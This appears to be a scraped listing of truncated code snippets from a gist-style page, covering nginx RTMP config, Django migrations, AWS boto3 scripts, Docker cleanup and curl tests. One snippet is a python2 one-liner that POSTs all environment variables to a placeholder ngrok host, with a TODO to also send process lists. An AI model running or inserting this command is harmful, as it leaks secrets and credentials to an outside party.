This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import time | |
| import pathlib | |
| import tarfile | |
| import tempfile | |
| import torch | |
| PROJECT_PATH = pathlib.Path(os.environ.get("PROJECT_PATH", ".")) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| worker_processes auto; | |
| rtmp_auto_push on; | |
| events {} | |
| rtmp { | |
| server { | |
| listen 1935; | |
| listen [::]:1935 ipv6only=on; | |
| application live { | |
| live on; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def add_child_page(parent_page, instance): | |
| """ | |
| Mimic the behavior of the "add_child" from Django treebeard. | |
| We can't use `parent_page.add_child(instance=child_page)` inside of | |
| migrations because historical models don't have access to class | |
| methods. This replicates the behavior of `add_child` by calculating | |
| the treebeard path, path depth and url path. | |
| https://django-treebeard.readthedocs.io/en/latest/api.html#treebeard.models.Node.add_child |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://craftcms.stackexchange.com/questions/13584/devmode-phpdotenv-variable-ignored | |
| 'devMode' => filter_var(getenv('DEV_MODE') ?: false, FILTER_VALIDATE_BOOLEAN), |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| HSPD=20000 | |
| LSPD=1000 | |
| ACC=300 | |
| DEC=300 | |
| EO=3 | |
| WHILE 1 = 1 | |
| X50000 | |
| Y50000 | |
| WAITX | |
| WAITY |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| import json | |
| import boto3 | |
| import argparse | |
| import time | |
| lambda_client = boto3.client('lambda') | |
| function_choices = [f['FunctionName'] for f in lambda_client.list_functions()['Functions']] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Send system env vars | |
| python2 -c "import os, urllib; urllib.urlopen('https://NGROK_URL', data=urllib.urlencode(os.environ))" | |
| # Send all running processes with arguments & env vars for process | |
| # @TODO |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import base64 | |
| import struct | |
| import boto3 | |
| import paramiko | |
| from paramiko.util import deflate_long | |
| PEM_FILEPATH = '~/.ssh/test-key.pem' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/sh | |
| set -e | |
| DOCKER_COMPOSE_SERVICE_NAME=db | |
| CONTAINER_ID=`docker-compose ps -q $DOCKER_COMPOSE_SERVICE_NAME` | |
| FULL_VOLUME_NAME=`docker inspect --format='{{range .Mounts}}{{.Name}} {{end}}' $CONTAINER_ID` | |
| docker volume rm $FULL_VOLUME_NAME |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| set -o errexit | |
| curl --fail --show-error --location http://httpbin.org/status/200 > /dev/null | |
| echo "It worked!" | |
| curl --fail --show-error --location http://httpbin.org/status/500 > /dev/null | |
| echo "It failed, but you will never see this message." |